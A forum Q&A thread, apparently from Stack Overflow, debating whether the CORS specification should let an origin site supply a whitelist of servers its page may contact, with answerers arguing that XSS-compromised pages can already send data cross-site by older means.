views:

404

answers:

3

I was reading about CORS (https://developer.mozilla.org/en/HTTP_access_control) and I think the implementation is both simple and effective.

However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.

But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.

I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.

So the expanded sequence would be:

1) Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc) 2) Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal 3) Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.

I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.

I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.

A: 

It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making a stricter cross domain policy on other tags (script/image) while being more secure, would break a lot of existing code, and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure its an easy transition first.

Russell Leggett
My main point was not so much the closing of the current loopholes, rather it was the fact that there appears (to me at least) to be a big hole in CORS spec.
David Semeria
+4  A: 

But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?

What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.

If malicious code has access to sensitive information, you have already totally lost.

3) Page wants to make an XHR request to malicious.com - request rejected locally

Why would a page try to make an XHR request to a site it has not already whitelisted?

If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.

bobince
Agreed - but surely it's desirable to make it hard for a compromised page to write information to a non-whitelisted location.I don't see it as working on the effects rather than the cause. A good bank vault would still try to make it very hard for the robbers to get the money out, even if they did manage to defeat the first level security and get into the vault in the first place.
David Semeria
An ineffective security measure is worse than no security measure.
bobince
"A good bank vault would still try to make it very hard for the robbers to get the money out, even if they did manage to defeat the first level security"Even the best bank vault wouldn't bother to install, for example, a steel barrier, knowing that the only thing the thief had to do was to walk around the barrier. As bobince stated, once you have an XSS vulnerability, you have already totally lost.
greim
A: 

I share David's concerns. Security must be built layer by layer and a white list served by the origin server seems to be a good approach.

Plus, this white list can be used to close existing loopholes (forms, script tag, etc...), it's safe to assume that a server serving the white list is designed to avoid back compatibility issues.

vmiazzo
Unfortunately the CSRF vulnerability is baked into the fundamental architecture of the web. There's no changing it now. Even if it *could* be changed, it's not clear that it *should* be changed. Yes there are security concerns, but security isn't the only consideration in the grand scheme of things.
greim